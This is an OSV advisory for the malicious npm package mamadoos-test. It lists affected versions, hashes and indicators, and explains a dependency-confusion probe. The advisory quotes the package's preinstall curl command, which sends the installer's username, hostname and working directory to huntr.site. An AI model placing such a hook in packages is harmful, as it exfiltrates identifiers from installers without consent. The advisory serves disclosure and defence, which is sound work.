MAL-2026-4605

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mamadoos-test/MAL-2026-4605.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4605

Published

2026-05-20T14:02:39Z

Modified

2026-05-26T06:02:39.730226609Z

Summary

Malicious code in mamadoos-test (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4)

package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd), embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on npm install with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (mamadoos-test: ^10.0.0), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003565",
            "versions": [
                "10.1.0"
            ],
            "sha256": "2157659011628b870955375b0817f0efe48e349e33d56ce6df600fc2dd49b5b4",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:13:53Z",
            "import_time": "2026-05-26T05:50:52.252692546Z"
        },
        {
            "id": "IN-MAL-2026-003566",
            "versions": [
                "11.0.0"
            ],
            "sha256": "e902eada172d070291ec61612790e0c092d05c3b15e628f8f882c511421624bc",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:23:32Z",
            "import_time": "2026-05-26T05:50:52.343617136Z"
        },
        {
            "id": "IN-MAL-2026-003564",
            "versions": [
                "10.1.0"
            ],
            "sha256": "21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:13:53Z",
            "import_time": "2026-05-26T05:50:52.095803077Z"
        },
        {
            "id": "IN-MAL-2026-003560",
            "versions": [
                "10.0.0"
            ],
            "sha256": "277d047f21aee2aec8b9d3cf07e8896540cb52a5422b8c8d23eebed8e53f2f75",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:02:39Z",
            "import_time": "2026-05-26T05:50:51.650607747Z"
        },
        {
            "id": "IN-MAL-2026-003567",
            "import_time": "2026-05-26T05:50:52.442455676Z",
            "sha256": "6cc33157a1957f8c02515b475a6cf70c8340a8bd8c98dd8a748b8d9cb57bf595",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:24:04Z",
            "versions": [
                "11.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-003559",
            "versions": [
                "10.0.0"
            ],
            "sha256": "b1f5386ccd6225cc257c44ad170e11b7ce8b580ba1d62877b71dbfdc41e0df49",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T14:02:39Z",
            "import_time": "2026-05-26T05:50:51.551698461Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / mamadoos-test

Package

Name: mamadoos-test; View open source insights on deps.dev
Purl: pkg:npm/mamadoos-test

Affected ranges

Affected versions

10.*

10.0.0

10.1.0

11.*

11.0.0

Database specific

indicators

{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "df62a8a3ba04f6eefd777b9053d6cce224e45d674f7724ddd94d9dcfdc53c198",
            "tlsh": "0dd022320c20d1f3bdca06a20825d00fba938e0b33882909eacb1404b0082b3d5a120f"
        }
    ],
    "package_integrity": [
        {
            "filename": "mamadoos-test-11.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-uVdyeFLh9zElcmZbtwhTJ+CwQWeDsquCt8wPS+nqiZqc3mjEvlAIqVvic5FcLxYD7wVfSRjgnsqRoKVJN68FCQ==",
                "sha1": "7d5da3b38ce39f5549a8613c2a4981db095c9e4d"
            }
        }
    ],
    "domains": [
        "huntr.site"
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mamadoos-test/MAL-2026-4605.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]